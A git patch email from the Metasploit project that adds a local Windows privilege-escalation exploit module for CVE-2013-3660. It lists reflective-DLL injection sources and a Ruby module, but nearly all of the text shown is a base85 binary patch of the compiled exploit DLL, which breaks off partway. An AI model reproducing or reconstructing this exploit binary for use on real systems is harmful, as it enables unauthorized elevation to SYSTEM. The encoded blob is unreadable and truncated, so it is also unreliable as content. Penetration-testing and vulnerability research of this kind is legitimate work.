From 7725937461d4f0a1093811cf02b97b5bc7662da7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 28 Jun 2013 18:18:21 -0500
Subject: [PATCH 01/11] Add Module for cve-2013-3660

---
 data/exploits/cve-2013-3660/exploit.dll       | Bin 0 -> 51200 bytes
 .../source/exploits/cve-2013-3660/LICENSE.txt |  25 +
 .../source/exploits/cve-2013-3660/Readme.md   |  40 +
 .../cve-2013-3660/dll/reflective_dll.sln      |  20 +
 .../cve-2013-3660/dll/reflective_dll.vcproj   | 357 ++++++++
 .../cve-2013-3660/dll/reflective_dll.vcxproj  | 264 ++++++
 .../dll/reflective_dll.vcxproj.filters        |  32 +
 .../cve-2013-3660/dll/src/ComplexPath.h       | 529 ++++++++++++
 .../dll/src/ReflectiveDLLInjection.h          |  51 ++
 .../cve-2013-3660/dll/src/ReflectiveDll.c     | 810 ++++++++++++++++++
 .../cve-2013-3660/dll/src/ReflectiveLoader.c  | 496 +++++++++++
 .../cve-2013-3660/dll/src/ReflectiveLoader.h  | 202 +++++
 .../exploits/cve-2013-3660/inject/inject.sln  |  20 +
 .../cve-2013-3660/inject/inject.vcproj        | 360 ++++++++
 .../cve-2013-3660/inject/inject.vcxproj       | 258 ++++++
 .../inject/inject.vcxproj.filters             |  35 +
 .../inject/src/GetProcAddressR.c              | 116 +++
 .../inject/src/GetProcAddressR.h              |  36 +
 .../cve-2013-3660/inject/src/Inject.c         | 120 +++
 .../cve-2013-3660/inject/src/LoadLibraryR.c   | 234 +++++
 .../cve-2013-3660/inject/src/LoadLibraryR.h   |  41 +
 .../inject/src/ReflectiveDLLInjection.h       |  51 ++
 .../source/exploits/cve-2013-3660/rdi.sln     |  46 +
 .../exploits/windows/local/ppr_flatten_rec.rb | 158 ++++
 24 files changed, 4301 insertions(+)
 create mode 100755 data/exploits/cve-2013-3660/exploit.dll
 create mode 100755 external/source/exploits/cve-2013-3660/LICENSE.txt
 create mode 100755 external/source/exploits/cve-2013-3660/Readme.md
 create mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
 create mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
 create mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
 create mode 100755 external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
 create mode 100755 external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
 create mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
 create mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
 create mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
 create mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
 create mode 100755 external/source/exploits/cve-2013-3660/inject/inject.sln
 create mode 100755 external/source/exploits/cve-2013-3660/inject/inject.vcproj
 create mode 100755 external/source/exploits/cve-2013-3660/inject/inject.vcxproj
 create mode 100755 external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
 create mode 100755 external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
 create mode 100755 external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
 create mode 100755 external/source/exploits/cve-2013-3660/inject/src/Inject.c
 create mode 100755 external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
 create mode 100755 external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
 create mode 100755 external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
 create mode 100755 external/source/exploits/cve-2013-3660/rdi.sln
 create mode 100644 modules/exploits/windows/local/ppr_flatten_rec.rb

diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
new file mode 100755
index 0000000000000000000000000000000000000000..8b7ae2134831b7ab7f7762cd62311766b8a957e7
GIT binary patch
literal 51200
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
